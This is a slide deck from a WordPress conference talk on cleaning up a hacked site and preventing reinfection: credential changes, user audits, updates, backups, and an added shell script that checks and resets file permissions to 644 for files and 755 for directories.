Your Site Has Been Hacked, Now What?
Michele Butcher
CantSpeakGeek.com WPSecurityLock.com
@Michele_Butcher
Slides can be found at: http://mlb.pw/WCSD2015
WordPress Specialist at WP Security Lock
Head Geek at Can’t Speak Geek
Sometimes a designer of pretty websites and graphics
Southern Illinois Meetup Co-Organizer
Beginners and Intermediate WordPress Instructor at John A Logan College
Michele Butcher
What do you do when your site gets hacked?
First option:
Pay someone else to clean it.
There are many services out there that will clean your site. Here is who I suggest.
• WP Security Lock: https://wpsecuritylock.com
• Sucuri Security: http://sucuri.net/
• Hack Repair: http://hackrepair.com
Second Option:
Clean it yourself
• Cheapest
• Most time consuming
• No one knows your site better than you do
• You just have to know what to look for
I do not suggest this if you are not comfortable reading HTML, PHP, and CSS.
When cleaning your site, add clean copies of core, your theme and your plugins. It makes cleaning so much easier.
This is a good time to audit everything on your site and delete what is not being used. You can always add other themes and plugins back later when you need them.
Now that you have all the malware removed, that does not mean we are done.
Check your users!
• You could have unwanted users
• Delete the unwanted guests immediately
• If you use “admin” as a username, delete it and make a new username
• Delete all users that are no longer using your dashboard (old devs, designers, guests)
• Only give others the access they need, not what they want. A guest blogger should never be an admin, only a contributor.
Check your FTP accounts on your server
You could have unwanted users here as well
Check your File Permissions
Files should be 644
Directories should be 755
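
The permission rule above, as an added example that is not part of the original slides: a POSIX shell script that lists, and optionally resets, everything under a WordPress directory that is not 644 (files) or 755 (directories). The function names and the `audit`/`fix` arguments are made up for this example, and it applies the slide's rule to every entry without exceptions.

```shell
#!/bin/sh
# Added example, not from the original slides.
# Rule from the slide: files 644, directories 755.
# wp_perm_audit / wp_perm_fix are names chosen for this example.

# Print (ls -ld format) every entry under ROOT whose mode breaks the rule.
wp_perm_audit() {
    root=$1
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }
    # -perm 644 / -perm 755 match the exact mode, so "!" selects everything
    # else: world-writable 666/777 as well as setuid/setgid/sticky bits.
    # Symlinks are skipped because find does not follow them by default.
    find "$root" -type d ! -perm 755 -exec ls -ld {} +
    find "$root" -type f ! -perm 644 -exec ls -ld {} +
}

# Reset only the entries that break the rule; everything else is untouched.
wp_perm_fix() {
    root=$1
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }
    # Directories first, so the file pass can descend into any directory
    # that was locked down before this run.
    find "$root" -type d ! -perm 755 -exec chmod 755 {} +
    find "$root" -type f ! -perm 644 -exec chmod 644 {} +
}

# Usage: sh wp-perms.sh audit /path/to/wordpress
#        sh wp-perms.sh fix   /path/to/wordpress
case "${1:-}" in
    audit) wp_perm_audit "${2:?path to WordPress directory}" ;;
    fix)   wp_perm_fix   "${2:?path to WordPress directory}" ;;
esac
```

Run `audit` and read the list before running `fix`: a file with an unexpected mode found during a cleanup is worth opening, not only resetting.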
Add some Security to your site
Some trusted plugins:
• iThemes Security or iThemes Security Pro
• Jetpack (BruteProtect and VaultPress)
• Wordfence
• Sucuri Firewall
Change your login information
• WordPress logins and passwords
• cPanel logins and passwords
• Database logins and passwords (remember to change them in your wp-config.php)
• Hosting logins and passwords
When it comes to usernames and passwords, here are a few tips.
• NEVER use “admin” as a username and “password” as the password. NEVER on anything!
• The harder a password is to remember, the harder it is to hack
• Use something like LastPass, 1Password, or KeePass to store your passwords
What do you do to not get hacked again?
First and most important!
UPDATE
UPDATE
UPDATE
Update core, update plugins, update themes!
A note on updating
If you use a theme and/or plugin that was purchased from Envato, ThemeForest, or CodeCanyon, please mark the box under each purchased item on the download page to be notified by email of updates. That is the only way they notify their customers of updates.
This is part of the reason the RevSlider SoakSoak infection was so widespread.
Pay attention to WordPress news and security sites
• WP Tavern
• WP Security Bloggers
• Sucuri Blog
• WP Security Lock
• Advanced WordPress (Facebook)
• Twitter
Only use trusted and supported themes and plugins
Do NOT use a theme or plugin if:
• It has not been updated in more than a year
• No one is responding in its support forums
• It shows that it does not work with the current version of core
Start Making Backups
• BackupBuddy
• BackWPup
• VaultPress (Jetpack)
• Check with your hosting company to see if they do backups as well
• iThemes Security (free and Pro) will do database backups
Speaking of backups…
Save them somewhere other than your server. Most have options to send them to an Amazon S3 account, Dropbox, email, or download to your machine.
Lastly, be active with your site. You know your site best. If something does not feel right, look into it.
Also, do not ignore your website. No one likes a zombie website.